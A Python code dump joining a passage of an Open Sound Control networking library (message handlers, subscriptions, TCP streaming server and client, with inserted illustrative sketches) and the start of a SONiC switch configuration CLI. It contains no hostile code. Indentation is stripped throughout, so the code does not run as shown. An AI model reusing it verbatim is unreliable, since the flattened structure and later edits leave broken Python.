(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints a "No callback registered to handle ..." message.
Returns None
"""
self.reportErr("No callback registered to handle OSC-address '%s'" % addr, client_address)
def msgPrinter_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints the received message.
Returns None
"""
txt = "OSCMessage '%s' from %s: " % (addr, getUrlStr(client_address))
txt += str(data)
self.printErr(txt)
def serverInfo_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler returns a reply to the client, which can contain various bits of information
about this server, depending on the first argument of the received OSC-message:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'address <string>' messages, listing the server's
OSC address-space.
- 'clients' | 'targets' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
"""
if len(data) == 0:
return None
cmd = data.pop(0)
reply = None
if cmd in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('info_command', "ls | list : list OSC address-space"))
reply.append(('info_command', "clients | targets : list subscribed clients"))
elif cmd in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for addr in list(self.callbacks.keys()):
reply.append(('address', addr))
elif cmd in ('clients', 'targets'):
if hasattr(self.client, 'getOSCTargetStrings'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
else:
cli_addr = self.client.address()
if cli_addr:
reply = OSCMessage(self.info_prefix)
reply.append(('target', "osc://%s/" % getUrlStr(cli_addr)))
else:
self.reportErr("unrecognized command '%s' in /info request from osc://%s. Try 'help'" % (cmd, getUrlStr(client_address)), client_address)
return reply
def _subscribe(self, data, client_address):
"""Handle the actual subscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>] [<filter>] [...]' string, which is then passed to
parseUrlStr() & parseFilterStr() to actually retreive <host>, <port>, etc.
This 'long way 'round' approach (almost) guarantees that the subscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (isinstance(item,int)) and not have_port:
url += ":%d" % item
have_port = True
elif isinstance(item,str):
url += item
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
if addr != None:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
port = client_address[1]
addr = (host, port)
else:
addr = client_address
self.client._setTarget(addr, prefix, filters)
trg = self.client.getOSCTargetStr(addr)
if trg[0] != None:
reply = OSCMessage(self.info_prefix)
reply.append(('target',) + trg)
return reply
def _unsubscribe(self, data, client_address):
"""Handle the actual unsubscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>]' string, which is then passed to
parseUrlStr() to actually retreive <host>, <port> & <prefix>.
This 'long way 'round' approach (almost) guarantees that the unsubscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (isinstance(item,int)) and not have_port:
url += ":%d" % item
have_port = True
elif isinstance(item,str):
url += item
(addr, _) = parseUrlStr(url)
if addr == None:
addr = client_address
else:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
try:
(host, port) = self.client._searchHostAddr(host)
except NotSubscribedError:
port = client_address[1]
addr = (host, port)
try:
self.client._delTarget(addr)
except NotSubscribedError as e:
txt = "%s: %s" % (e.__class__.__name__, str(e))
self.printErr(txt)
reply = OSCMessage(self.error_prefix)
reply.append(txt)
return reply
def subscription_handler(self, addr, tags, data, client_address):
"""Handle 'subscribe' / 'unsubscribe' requests from remote hosts,
if the local Client supports this (i.e. OSCMultiClient).
Supported commands:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
- '[subscribe | listen | sendto | target] <url> [<filter> ...] : Subscribe remote client/server at <url>,
and/or set message-filters for messages being sent to the subscribed host, with the optional <filter>
arguments. Filters are given as OSC-addresses (or '*') prefixed by a '+' (send matching messages) or
a '-' (don't send matching messages). The wildcard '*', '+*' or '+/*' means 'send all' / 'filter none',
and '-*' or '-/*' means 'send none' / 'filter all' (which is not the same as unsubscribing!)
Reply is an OSCMessage with the (new) subscription; 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
- '[unsubscribe | silence | nosend | deltarget] <url> : Unsubscribe remote client/server at <url>
If the given <url> isn't subscribed, a NotSubscribedError-message is printed (and possibly sent)
The <url> given to the subscribe/unsubscribe handler should be of the form:
'[osc://][<host>][:<port>][<prefix>]', where any or all components can be omitted.
If <host> is not specified, the IP-address of the message's source is used.
If <port> is not specified, the <host> is first looked up in the list of subscribed hosts, and if found,
the associated port is used.
If <port> is not specified and <host> is not yet subscribed, the message's source-port is used.
If <prefix> is specified on subscription, <prefix> is prepended to the OSC-address of all messages
sent to the subscribed host.
If <prefix> is specified on unsubscription, the subscribed host is only unsubscribed if the host,
port and prefix all match the subscription.
If <prefix> is not specified on unsubscription, the subscribed host is unsubscribed if the host and port
match the subscription.
"""
if not isinstance(self.client, OSCMultiClient):
raise OSCServerError("Local %s does not support subsctiptions or message-filtering" % self.client.__class__.__name__)
addr_cmd = addr.split('/')[-1]
if len(data):
if data[0] in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('subscribe_command', "ls | list : list subscribed targets"))
reply.append(('subscribe_command', "[subscribe | listen | sendto | target] <url> [<filter> ...] : subscribe to messages, set filters"))
reply.append(('subscribe_command', "[unsubscribe | silence | nosend | deltarget] <url> : unsubscribe from messages"))
return reply
if data[0] in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
return reply
if data[0] in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data[1:], client_address)
if data[0] in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data[1:], client_address)
if addr_cmd in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data, client_address)
if addr_cmd in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data, client_address)
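# --- Illustrative usage sketch (not part of the original module) ---
# A minimal synchronous OSCServer set-up using the classes defined above.
# The port number and the '/echo' address are made up for illustration;
# handlers follow the (addr, tags, data, client_address) signature described
# in the docstrings above, and a returned OSCMessage is sent back to the
# originating client.
def _example_run_osc_server():
    def echo_handler(addr, tags, data, client_address):
        reply = OSCMessage("/echoed")
        reply.append(data)
        return reply

    srv = OSCServer(("127.0.0.1", 9001))
    srv.addDefaultHandlers()                  # 'default', '/info', '/error', '/print', ...
    srv.addMsgHandler("/echo", echo_handler)  # register a custom callback
    try:
        srv.serve_forever()                   # blocks; socket_timeout lets close() take effect
    finally:
        srv.close()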
class ForkingOSCServer(ForkingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server forks a new process to handle each incoming request.
"""
# use the multi-threaded ThreadingOSCRequestHandler, so sub-bundles are unbundled in parallel
RequestHandlerClass = ThreadingOSCRequestHandler
class ThreadingOSCServer(ThreadingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server starts a new thread to handle each incoming request.
"""
# use the multi-threaded ThreadingOSCRequestHandler, so sub-bundles are unbundled in parallel
RequestHandlerClass = ThreadingOSCRequestHandler
######
#
# OSCError classes
#
######
class OSCError(Exception):
"""Base Class for all OSC-related errors
"""
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class OSCClientError(OSCError):
"""Class for all OSCClient errors
"""
pass
class OSCServerError(OSCError):
"""Class for all OSCServer errors
"""
pass
class NoCallbackError(OSCServerError):
"""This error is raised (by an OSCServer) when an OSCMessage with an 'unmatched' address-pattern
is received, and no 'default' handler is registered.
"""
def __init__(self, pattern):
"""The specified 'pattern' should be the OSC-address of the 'unmatched' message causing the error to be raised.
"""
self.message = "No callback registered to handle OSC-address '%s'" % pattern
class NotSubscribedError(OSCClientError):
"""This error is raised (by an OSCMultiClient) when an attempt is made to unsubscribe a host
that isn't subscribed.
"""
def __init__(self, addr, prefix=None):
if prefix:
url = getUrlStr(addr, prefix)
else:
url = getUrlStr(addr, '')
self.message = "Target osc://%s is not subscribed" % url
######
#
# OSC over streaming transport layers (usually TCP)
#
# Note from the OSC 1.0 specifications about streaming protocols:
#
# The underlying network that delivers an OSC packet is responsible for
# delivering both the contents and the size to the OSC application. An OSC
# packet can be naturally represented by a datagram by a network protocol such
# as UDP. In a stream-based protocol such as TCP, the stream should begin with
# an int32 giving the size of the first packet, followed by the contents of the
# first packet, followed by the size of the second packet, etc.
#
# The contents of an OSC packet must be either an OSC Message or an OSC Bundle.
# The first byte of the packet's contents unambiguously distinguishes between
# these two alternatives.
#
######
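# --- Illustrative sketch (not part of the original module) of the stream
# framing described in the note above: over TCP every OSC packet is preceded
# by a big-endian int32 holding its size. 'sock' is assumed to be a connected
# stream socket and 'packet' the binary form of an OSC Message or Bundle.
def _example_send_framed_packet(sock, packet):
    sock.sendall(struct.pack(">L", len(packet)) + packet)

def _example_recv_framed_packet(sock):
    header = b""
    while len(header) < 4:
        part = sock.recv(4 - len(header))
        if not part:
            return None
        header += part
    (size,) = struct.unpack(">L", header)
    data = b""
    while len(data) < size:
        part = sock.recv(size - len(data))
        if not part:
            return None
        data += part
    return data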
class OSCStreamRequestHandler(StreamRequestHandler, OSCAddressSpace):
""" This is the central class of a streaming OSC server. If a client
connects to the server, the server instantiates a OSCStreamRequestHandler
for each new connection. This is fundamentally different to a packet
oriented server which has a single address space for all connections.
This connection based (streaming) OSC server maintains an address space
for each single connection, because usually tcp server spawn a new thread
or process for each new connection. This would generate severe
multithreading synchronization problems when each thread would operate on
the same address space object. Therefore: To implement a streaming/TCP OSC
server a custom handler must be implemented which implements the
setupAddressSpace member in which it creates its own address space for this
very connection. This has been done within the testbench and can serve as
inspiration.
"""
def __init__(self, request, client_address, server):
""" Initialize all base classes. The address space must be initialized
before the stream request handler because the initialization function
of the stream request handler calls the setup member which again
requires an already initialized address space.
"""
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
StreamRequestHandler.__init__(self, request, client_address, server)
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def setup(self):
StreamRequestHandler.setup(self)
print("SERVER: New client connection.")
self.setupAddressSpace()
self.server._clientRegister(self)
def setupAddressSpace(self):
""" Override this function to customize your address space. """
pass
def finish(self):
StreamRequestHandler.finish(self)
self.server._clientUnregister(self)
print("SERVER: Client connection handled.")
def _transmit(self, data):
sent = 0
while sent < len(data):
tmp = self.connection.send(data[sent:])
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsg(self, msg):
"""Send an OSC message over a streaming socket. Raises exception if it
should fail. If everything is transmitted properly, True is returned. If
socket has been closed, False.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
try:
binary = msg.getBinary()
length = len(binary)
# prepend the packet length (big-endian 32-bit unsigned) before the actual message;
# struct.pack() is used directly because array.array('c') no longer exists in Python 3
len_big_endian = struct.pack(">L", length)
if self._transmit(len_big_endian) and self._transmit(binary):
return True
return False
except socket.error as e:
if e.errno == errno.EPIPE: # broken pipe
return False
raise e
def _receive(self, count):
""" Receive a certain amount of data from the socket and return it. If the
remote end should be closed in the meanwhile None is returned.
"""
chunk = self.connection.recv(count)
if not chunk or len(chunk) == 0:
return None
while len(chunk) < count:
tmp = self.connection.recv(count - len(chunk))
if not tmp or len(tmp) == 0:
return None
chunk = chunk + tmp
return chunk
def _receiveMsg(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get the OSC packet size from the stream; it is prepended to each transmission
chunk = self._receive(4)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receive(slen)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# decode OSC data and dispatch
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("SERVER: Message decoding failed.")
return msg
def handle(self):
"""
Handle a connection.
"""
# set socket blocking to avoid "resource currently not available"
# exceptions, because the connection socket inherits the settings
# from the listening socket and this times out from time to time
# in order to provide a way to shut the server down. But we want
# clean and blocking behaviour here
self.connection.settimeout(None)
print("SERVER: Entered server loop")
try:
while True:
decoded = self._receiveMsg()
if decoded == None:
return
elif len(decoded) <= 0:
# if message decoding fails we try to stay in sync but print a message
print("OSC stream server: Spurious message received.")
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
# no replies, continue receiving
continue
self._txMutex.acquire()
txOk = self._transmitMsg(msg)
self._txMutex.release()
if not txOk:
break
except socket.error as e:
if e.errno == errno.ECONNRESET:
# if connection has been reset by client, we do not care much
# about it, we just assume our duty fulfilled
print("SERVER: Connection has been reset by peer.")
else:
raise e
def sendOSC(self, oscData):
""" This member can be used to transmit OSC messages or OSC bundles
over the client/server connection. It is thread-safe.
"""
self._txMutex.acquire()
result = self._transmitMsg(oscData)
self._txMutex.release()
return result
""" TODO Note on threaded unbundling for streaming (connection oriented)
transport:
Threaded unbundling as implemented in ThreadingOSCServer must be implemented in
a different way for the streaming variant, because contrary to the datagram
version the streaming handler is instantiated only once per connection. This
leads to the problem (if threaded unbundling is implemented as in OSCServer)
that all further message reception is blocked until all (previously received)
pending messages are processed.
Each StreamRequestHandler should provide a so-called processing queue into which
all pending messages or sub-bundles are inserted, to be processed in the future.
When a sub-bundle or message gets queued, a mechanism must be provided so that
those messages get dispatched once their timetag is due. There are the following
options:
- a timer is started which checks at regular intervals for messages in the
queue (polling - requires CPU resources)
- a dedicated timer is started for each message (requires timer resources)
"""
class OSCStreamingServer(TCPServer):
""" A connection oriented (TCP/IP) OSC server.
"""
# define a socket timeout, so the serve_forever loop can actually exit.
# with 2.6 and server.shutdown this wouldn't be necessary
socket_timeout = 1
# this is the class which handles a new connection. Override this for a
# useful customized server. See the testbench for an example
RequestHandlerClass = OSCStreamRequestHandler
def __init__(self, address):
"""Instantiate an OSCStreamingServer.
- address ((host, port) tuple): the local host & TCP-port
the server listens on for new connections.
"""
self._clientList = []
self._clientListMutex = threading.Lock()
TCPServer.__init__(self, address, self.RequestHandlerClass)
self.socket.settimeout(self.socket_timeout)
def serve_forever(self):
"""Handle one request at a time until server is closed.
Had to add this since 2.5 does not support server.shutdown()
"""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def start(self):
""" Start the server thread. """
self._server_thread = threading.Thread(target=self.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
def stop(self):
""" Stop the server thread and close the socket. """
self.running = False
self._server_thread.join()
self.server_close()
# 2.6 only
#self.shutdown()
def _clientRegister(self, client):
""" Gets called by each request/connection handler when connection is
established to add itself to the client list
"""
self._clientListMutex.acquire()
self._clientList.append(client)
self._clientListMutex.release()
def _clientUnregister(self, client):
""" Gets called by each request/connection handler when connection is
lost to remove itself from the client list
"""
self._clientListMutex.acquire()
self._clientList.remove(client)
self._clientListMutex.release()
def broadcastToClients(self, oscData):
""" Send OSC message or bundle to all connected clients. """
result = True
for client in self._clientList:
result = result and client.sendOSC(oscData)
return result
class OSCStreamingServerThreading(ThreadingMixIn, OSCStreamingServer):
""" Implements a server which spawns a separate thread for each incoming
connection. Care must be taken since the OSC address space is the same
for all connections.
"""
pass
class OSCStreamingClient(OSCAddressSpace):
""" OSC streaming client.
A streaming client establishes a connection to a streaming server but must
be able to handle replies by the server as well. To accomplish this the
receiving takes place in a secondary thread, because no one knows if we
have to expect a reply or not, i.e. synchronous architecture doesn't make
much sense.
Replies will be matched against the local address space. If message
handlers access code of the main thread (where the client messages are sent
to the server), care must be taken, e.g. by installing synchronization
mechanisms or by using an event dispatcher which can handle events
originating from other threads.
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
rcvbuf_size = 4096 * 8
def __init__(self):
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.rcvbuf_size)
self.socket.settimeout(1.0)
self._running = False
def _receiveWithTimeout(self, count):
chunk = bytes()  # bytes, since socket.recv() returns bytes
while len(chunk) < count:
try:
tmp = self.socket.recv(count - len(chunk))
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return None
else:
continue
except socket.error as e:
if e.errno == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return None
else:
raise e
if not tmp or len(tmp) == 0:
print("CLIENT: Socket has been closed.")
return None
chunk = chunk + tmp
return chunk
def _receiveMsgWithTimeout(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get the OSC packet size from the stream; it is prepended to each transmission
chunk = self._receiveWithTimeout(4)
if not chunk:
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receiveWithTimeout(slen)
if not chunk:
return None
# decode OSC content
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("CLIENT: Message decoding failed.")
return msg
def _receiving_thread_entry(self):
print("CLIENT: Entered receiving thread.")
self._running = True
while self._running:
decoded = self._receiveMsgWithTimeout()
if not decoded:
break
elif len(decoded) <= 0:
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
continue
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
if not txOk:
break
print("CLIENT: Receiving thread terminated.")
def _unbundle(self, decoded):
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.socket.getpeername())
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def connect(self, address):
self.socket.connect(address)
self.receiving_thread = threading.Thread(target=self._receiving_thread_entry)
self.receiving_thread.start()
def close(self):
# let socket time out
self._running = False
self.receiving_thread.join()
self.socket.close()
def _transmitWithTimeout(self, data):
sent = 0
while sent < len(data):
try:
tmp = self.socket.send(data[sent:])
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return False
else:
continue
except socket.error as e:
if e.errno == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return False
else:
raise e
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsgWithTimeout(self, msg):
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
binary = msg.getBinary()
length = len(binary)
# prepend the packet length (big-endian 32-bit unsigned) before the actual message;
# struct.pack() is used directly because array.array('c') no longer exists in Python 3
len_big_endian = struct.pack(">L", length)
if self._transmitWithTimeout(len_big_endian) and self._transmitWithTimeout(binary):
return True
else:
return False
def sendOSC(self, msg):
"""Send an OSC message or bundle to the server. Returns True on success.
"""
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
return txOk
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.socket.getpeername()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
# 'cmp' is not available in Python 3; compare the underlying sockets directly
isequal = self.socket == other.socket
if isequal and getattr(self, 'server', None) and getattr(other, 'server', None):
return self.server == other.server
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
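# --- Illustrative usage sketch (not part of the original module): connect an
# OSCStreamingClient to a streaming server and send one message. Host, port
# and the '/ping' address are made up for illustration.
def _example_run_streaming_client():
    client = OSCStreamingClient()
    client.connect(("127.0.0.1", 9002))
    msg = OSCMessage("/ping")
    msg.append("hello")
    if not client.sendOSC(msg):
        print("CLIENT: sending failed")
    client.close()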
|
main.py
|
#!/usr/bin/env python
import click
import ipaddress
import json
import netaddr
import netifaces
import os
import re
import subprocess
import sys
import threading
import time
from minigraph import parse_device_desc_xml
from portconfig import get_child_ports
from sonic_py_common import device_info, multi_asic
from sonic_py_common.interface import get_interface_table_name, get_port_table_name
from swsssdk import ConfigDBConnector, SonicDBConfig
from swsscommon.swsscommon import SonicV2Connector
from utilities_common.db import Db
from utilities_common.intf_filter import parse_interface_in_filter
import utilities_common.cli as clicommon
from .utils import log
import aaa
import console
import feature
import kube
import mlnx
import nat
import vlan
from config_mgmt import ConfigMgmtDPB
import chassis_modules
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help', '-?'])
SONIC_GENERATED_SERVICE_PATH = '/etc/sonic/generated_services.conf'
SONIC_CFGGEN_PATH = '/usr/local/bin/sonic-cfggen'
VLAN_SUB_INTERFACE_SEPARATOR = '.'
ASIC_CONF_FILENAME = 'asic.conf'
DEFAULT_CONFIG_DB_FILE = '/etc/sonic/config_db.json'
NAMESPACE_PREFIX = 'asic'
INTF_KEY = "interfaces"
INIT_CFG_FILE = '/etc/sonic/init_cfg.json'
SYSTEMCTL_ACTION_STOP="stop"
SYSTEMCTL_ACTION_RESTART="restart"
SYSTEMCTL_ACTION_RESET_FAILED="reset-failed"
DEFAULT_NAMESPACE = ''
CFG_LOOPBACK_PREFIX = "Loopback"
CFG_LOOPBACK_PREFIX_LEN = len(CFG_LOOPBACK_PREFIX)
CFG_LOOPBACK_NAME_TOTAL_LEN_MAX = 11
CFG_LOOPBACK_ID_MAX_VAL = 999
CFG_LOOPBACK_NO="<0-999>"
asic_type = None
#
# Breakout Mode Helper functions
#
# Read given JSON file
def readJsonFile(fileName):
try:
with open(fileName) as f:
result = json.load(f)
except Exception as e:
raise Exception(str(e))
return result
def _get_breakout_options(ctx, args, incomplete):
""" Provides dynamic mode option as per user argument i.e. interface name """
all_mode_options = []
interface_name = args[-1]
breakout_cfg_file = device_info.get_path_to_port_config_file()
if not os.path.isfile(breakout_cfg_file) or not breakout_cfg_file.endswith('.json'):
return []
else:
breakout_file_input = readJsonFile(breakout_cfg_file)
if interface_name in breakout_file_input[INTF_KEY]:
breakout_mode_list = [v["breakout_modes"] for i ,v in breakout_file_input[INTF_KEY].items() if i == interface_name][0]
breakout_mode_options = []
for i in breakout_mode_list.split(','):
breakout_mode_options.append(i)
all_mode_options = [str(c) for c in breakout_mode_options if incomplete in c]
return all_mode_options
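# --- Illustrative sketch (not part of the original file): _get_breakout_options
# is intended as a shell-completion callback for a Click argument. Assuming a
# Click release that still supports the 'autocompletion' parameter (7.x), it
# could be wired up roughly as below; the command and argument names are made
# up for illustration, and the snippet is kept commented out because the
# 'config' group is only defined further down in this file.
#
# @config.command('example-breakout')
# @click.argument('interface_name', metavar='<interface_name>', required=True)
# @click.argument('mode', required=True, type=click.STRING, autocompletion=_get_breakout_options)
# def example_breakout(interface_name, mode):
#     click.echo("Selected breakout mode {} for {}".format(mode, interface_name))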
def shutdown_interfaces(ctx, del_intf_dict):
""" shut down all the interfaces before deletion """
for intf in del_intf_dict.keys():
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, intf)
if interface_name is None:
click.echo("[ERROR] interface name is None!")
return False
if interface_name_is_valid(config_db, intf) is False:
click.echo("[ERROR] Interface name is invalid. Please enter a valid interface name!!")
return False
port_dict = config_db.get_table('PORT')
if not port_dict:
click.echo("port_dict is None!")
return False
if intf in port_dict.keys():
config_db.mod_entry("PORT", intf, {"admin_status": "down"})
else:
click.secho("[ERROR] Could not get the correct interface name, exiting", fg='red')
return False
return True
def _validate_interface_mode(ctx, breakout_cfg_file, interface_name, target_brkout_mode, cur_brkout_mode):
""" Validate Parent interface and user selected mode before starting deletion or addition process """
breakout_file_input = readJsonFile(breakout_cfg_file)["interfaces"]
if interface_name not in breakout_file_input:
click.secho("[ERROR] {} is not a Parent port. So, Breakout Mode is not available on this port".format(interface_name), fg='red')
return False
# Check whether target breakout mode is available for the user-selected interface or not
if target_brkout_mode not in breakout_file_input[interface_name]["breakout_modes"]:
click.secho('[ERROR] Target mode {} is not available for the port {}'. format(target_brkout_mode, interface_name), fg='red')
return False
# Get config db context
config_db = ctx.obj['config_db']
port_dict = config_db.get_table('PORT')
# Check whether there is any port in config db.
if not port_dict:
click.echo("port_dict is None!")
return False
# Check whether the user-selected interface is part of 'port' table in config db.
if interface_name not in port_dict.keys():
click.secho("[ERROR] {} is not in port_dict".format(interface_name))
return False
click.echo("\nRunning Breakout Mode : {} \nTarget Breakout Mode : {}".format(cur_brkout_mode, target_brkout_mode))
if (cur_brkout_mode == target_brkout_mode):
click.secho("[WARNING] No action will be taken as current and desired Breakout Mode are same.", fg='magenta')
sys.exit(0)
return True
def load_ConfigMgmt(verbose):
""" Load config for the commands which are capable of change in config DB. """
try:
cm = ConfigMgmtDPB(debug=verbose)
return cm
except Exception as e:
raise Exception("Failed to load the config. Error: {}".format(str(e)))
def breakout_warnUser_extraTables(cm, final_delPorts, confirm=True):
"""
Function to warn the user about extra tables during Dynamic Port Breakout (DPB).
confirm: re-confirm with the user before proceeding.
Config tables without a YANG model are considered extra tables.
cm: instance of the config management class.
"""
try:
# check if any extra tables exist
eTables = cm.tablesWithOutYang()
if len(eTables):
# find relevant tables among the extra tables, i.e. ones which can contain
# the deleted ports
tables = cm.configWithKeys(configIn=eTables, keys=final_delPorts)
click.secho("Below Config can not be verified, It may cause harm "\
"to the system\n {}".format(json.dumps(tables, indent=2)))
click.confirm('Do you wish to Continue?', abort=True)
except Exception as e:
raise Exception("Failed in breakout_warnUser_extraTables. Error: {}".format(str(e)))
return
def breakout_Ports(cm, delPorts=list(), portJson=dict(), force=False, \
loadDefConfig=False, verbose=False):
deps, ret = cm.breakOutPort(delPorts=delPorts, portJson=portJson, \
force=force, loadDefConfig=loadDefConfig)
# check if DPB failed
if ret == False:
if not force and deps:
click.echo("Dependecies Exist. No further action will be taken")
click.echo("*** Printing dependecies ***")
for dep in deps:
click.echo(dep)
sys.exit(0)
else:
click.echo("[ERROR] Port breakout Failed!!! Opting Out")
raise click.Abort()
return
#
# Helper functions
#
# Execute action per NPU instance for multi instance services.
def execute_systemctl_per_asic_instance(inst, event, service, action):
try:
click.echo("Executing {} of service {}@{}...".format(action, service, inst))
clicommon.run_command("systemctl {} {}@{}.service".format(action, service, inst))
except SystemExit as e:
log.log_error("Failed to execute {} of service {}@{} with error {}".format(action, service, inst, e))
# Set the event object if there is a failure and exception was raised.
event.set()
# Execute action on list of systemd services
def execute_systemctl(list_of_services, action):
num_asic = multi_asic.get_num_asics()
generated_services_list, generated_multi_instance_services = _get_sonic_generated_services(num_asic)
if ((generated_services_list == []) and
(generated_multi_instance_services == [])):
log.log_error("Failed to get generated services")
return
for service in list_of_services:
if (service + '.service' in generated_services_list):
try:
click.echo("Executing {} of service {}...".format(action, service))
clicommon.run_command("systemctl {} {}".format(action, service))
except SystemExit as e:
log.log_error("Failed to execute {} of service {} with error {}".format(action, service, e))
raise
if (service + '.service' in generated_multi_instance_services):
# With Multi NPU, Start a thread per instance to do the "action" on multi instance services.
if multi_asic.is_multi_asic():
threads = []
# Use this event object to co-ordinate if any threads raised exception
e = threading.Event()
kwargs = {'service': service, 'action': action}
for inst in range(num_asic):
t = threading.Thread(target=execute_systemctl_per_asic_instance, args=(inst, e), kwargs=kwargs)
threads.append(t)
t.start()
# Wait for all the threads to finish.
for inst in range(num_asic):
threads[inst].join()
# Check if any of the threads have raised exception, if so exit the process.
if e.is_set():
sys.exit(1)
def _get_device_type():
"""
Get device type
TODO: move to sonic-py-common
"""
command = "{} -m -v DEVICE_METADATA.localhost.type".format(SONIC_CFGGEN_PATH)
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
device_type, err = proc.communicate()
if err:
click.echo("Could not get the device type from minigraph, setting device type to Unknown")
device_type = 'Unknown'
else:
device_type = device_type.strip()
return device_type
